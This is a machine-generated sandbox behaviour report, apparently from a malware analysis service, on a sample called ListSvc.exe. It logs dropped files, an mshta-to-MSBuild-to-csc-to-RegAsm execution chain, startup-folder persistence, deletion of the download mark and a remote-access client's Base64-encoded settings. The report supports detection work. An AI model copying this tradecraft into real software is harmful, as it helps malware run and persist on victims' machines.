Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process created: C:\Users\user\AppData\Roaming\AppLaunch.exe C:\Users\user\AppData\Roaming\AppLaunch.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3401.tmp' 'c:\Users\user\AppData\Local\Temp\atxm53jg\CSCE614293691B34F60A637EC21F5846844.TMP'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Local\Temp\ListSvc.url'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF3F6.tmp' 'c:\Users\user\AppData\Local\Temp\wukkzmi2\CSC931589AEA7104917A111E4852BF690F6.TMP'

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	0_2_004AF110
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	1_2_0060F6D8
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	2_2_004AF110
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	3_2_0060F6D8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ListSvc.exe

File created: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Code function: 1_2_0062CFB8 GetVersion,CoCreateInstance,

1_2_0062CFB8

Source: C:\Users\user\Desktop\ListSvc.exe

Code function: 0_2_0041A4DC GetDiskFreeSpaceW,

0_2_0041A4DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: 23.2.RegAsm.exe.400000.0.unpack, xClient/Config/Settings.cs	Base64 encoded string: 'NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg==', 'lr0cGnntXeP884kQkq97KEh9aeg5b2Z52JSKhFrfdZoxHnc4P1wVHOwIvB5V/OdCpHdqHZN/GRVvu4CdFGYDtQ==', 'ZjLrYsUilPtYnSQnW5lDbGcL0dkmpAij+LgvSyrOyuW8b9cIjaFftbjSiQls7XMdT3XrUz2b+hitIMxWMWsbxA==', 'QvQ/l/4+QDiMH1Z7M9YtstOoSzwC8aEsa+8jzP1xuA3VOBMXiQlmBmOUY5lAXnKeHW3yeb02TfL6Yk6dw0uLRQ==', 'O0YG2r3pPKaxZzH0YLfvh+YmbCzYSSXwtDOkZBRPdg6hj3BBo4WbxNMqLc3hkMqxiuRD5xKS+748xGbwDFErSg==', 'mSS/F1LYl2+Qp5fv/Q/2C86lg7m86lfzDCAFxenqPLP1QlxnE1HMaRj11i5PvxTMlVDjpy5wEKgXZJAxZ3RrNw=='
Source: 38.2.RegAsm.exe.400000.0.unpack, xClient/Config/Settings.cs	Base64 encoded string: 'NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg==', 'lr0cGnntXeP884kQkq97KEh9aeg5b2Z52JSKhFrfdZoxHnc4P1wVHOwIvB5V/OdCpHdqHZN/GRVvu4CdFGYDtQ==', 'ZjLrYsUilPtYnSQnW5lDbGcL0dkmpAij+LgvSyrOyuW8b9cIjaFftbjSiQls7XMdT3XrUz2b+hitIMxWMWsbxA==', 'QvQ/l/4+QDiMH1Z7M9YtstOoSzwC8aEsa+8jzP1xuA3VOBMXiQlmBmOUY5lAXnKeHW3yeb02TfL6Yk6dw0uLRQ==', 'O0YG2r3pPKaxZzH0YLfvh+YmbCzYSSXwtDOkZBRPdg6hj3BBo4WbxNMqLc3hkMqxiuRD5xKS+748xGbwDFErSg==', 'mSS/F1LYl2+Qp5fv/Q/2C86lg7m86lfzDCAFxenqPLP1QlxnE1HMaRj11i5PvxTMlVDjpy5wEKgXZJAxZ3RrNw=='

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\xKPsYGDxykRWIycR43
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01

Source: ListSvc.exe	String found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
Source: ListSvc.exe	String found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: ListSvc.exe

Static file information: File size 2295403 > 1048576

Source: ListSvc.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: H,pc:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb source: csc.exe, 0000000D.00000003.393848879.000000000091D000.00000004.00000001.sdmp
Source:	Binary string: atxm53jg.pdb source: MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdbX source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp
Source:	Binary string: m:C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb source: MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.pdbX source: MSBuild.exe, 00000019.00000002.563212292.00000000053E0000.00000004.00020000.sdmp
Source:	Binary string: m:C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb(@ source: MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.pdb source: MSBuild.exe, 00000019.00000002.563212292.00000000053E0000.00000004.00020000.sdmp, csc.exe, 0000001E.00000003.500074692.000000000DB91000.00000004.00000001.sdmp
Source:	Binary string: applaunch.pdb source: AppLaunch.exe, 00000008.00000000.364620319.00000000010F1000.00000020.00020000.sdmp
Source:	Binary string: wukkzmi2.pdb source: MSBuild.exe, 00000019.00000002.556425095.00000000028A2000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, csc.exe, 0000000D.00000003.393612970.000000000D631000.00000004.00000001.sdmp
Source:	Binary string: m:C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.pdb source: MSBuild.exe, 00000019.00000002.556425095.00000000028A2000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004B5000 push 004B50DEh; ret	0_2_004B50D6
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004B5980 push 004B5A48h; ret	0_2_004B5A40
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00458000 push ecx; mov dword ptr [esp], ecx	0_2_00458005
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0049B03C push ecx; mov dword ptr [esp], edx	0_2_0049B03D
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004A00F8 push ecx; mov dword ptr [esp], edx	0_2_004A00F9
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00458084 push ecx; mov dword ptr [esp], ecx	0_2_00458089
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004B1084 push 004B10ECh; ret	0_2_004B10E4
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004A1094 push ecx; mov dword ptr [esp], edx	0_2_004A1095
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0041A0B4 push ecx; mov dword ptr [esp], ecx	0_2_0041A0B8
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004270BC push 00427104h; ret	0_2_004270FC
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00458108 push ecx; mov dword ptr [esp], ecx	0_2_0045810D
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004321C8 push ecx; mov dword ptr [esp], edx	0_2_004321C9
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004A21D8 push ecx; mov dword ptr [esp], edx	0_2_004A21D9
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0049E1B8 push ecx; mov dword ptr [esp], edx	0_2_0049E1B9
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0049A260 push 0049A378h; ret	0_2_0049A370
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00455268 push ecx; mov dword ptr [esp], ecx	0_2_0045526C
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004252D4 push ecx; mov dword ptr [esp], eax	0_2_004252D9
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004592FC push ecx; mov dword ptr [esp], edx	0_2_004592FD
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0045B284 push ecx; mov dword ptr [esp], edx	0_2_0045B285
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00430358 push ecx; mov dword ptr [esp], eax	0_2_00430359
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00430370 push ecx; mov dword ptr [esp], eax	0_2_00430371
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00459394 push ecx; mov dword ptr [esp], ecx	0_2_00459398
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004A1428 push ecx; mov dword ptr [esp], edx	0_2_004A1429
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0049B424 push ecx; mov dword ptr [esp], edx	0_2_0049B425
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004A24D8 push ecx; mov dword ptr [esp], edx	0_2_004A24D9
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004224F0 push 004225F4h; ret	0_2_004225EC
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_004304F0 push ecx; mov dword ptr [esp], eax	0_2_004304F1
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00499490 push ecx; mov dword ptr [esp], edx	0_2_00499493
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00458564 push ecx; mov dword ptr [esp], edx	0_2_00458565
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00458574 push ecx; mov dword ptr [esp], edx	0_2_00458575
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_00457574 push ecx; mov dword ptr [esp], ecx	0_2_00457578

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline'

Source: ListSvc.exe	Static PE information: section name: .didata
Source: ListSvc.tmp.0.dr	Static PE information: section name: .didata
Source: ListSvc.tmp.2.dr	Static PE information: section name: .didata
Source: is-EQBV6.tmp.3.dr	Static PE information: section name: .didat

Source: initial sample	Static PE information: section name: .text entropy: 7.15035936237
Source: initial sample	Static PE information: section name: .text entropy: 7.15042351716

Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-D9R9F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\ServiceModelInstallRC.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-VLJFI.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-ITNUJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\ServiceModelEvents.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-EQBV6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-5BN3G.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\AppLaunch.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\SbsNclPerf.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\webuser4.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\WMINet_Utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-H2SC5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\ListSvc.exe	File created: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-0A4N9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\webuser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\ServiceModelPerformanceCounters.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ListSvc.exe	File created: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	File created: C:\Users\user\AppData\Roaming\is-SF1RP.tmp	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ListSvc.lnk

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ListSvc.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,	1_2_005C90B4
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,	1_2_006A68B0
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,	3_2_005C90B4
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,	3_2_006A68B0

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\ListSvc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ListSvc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
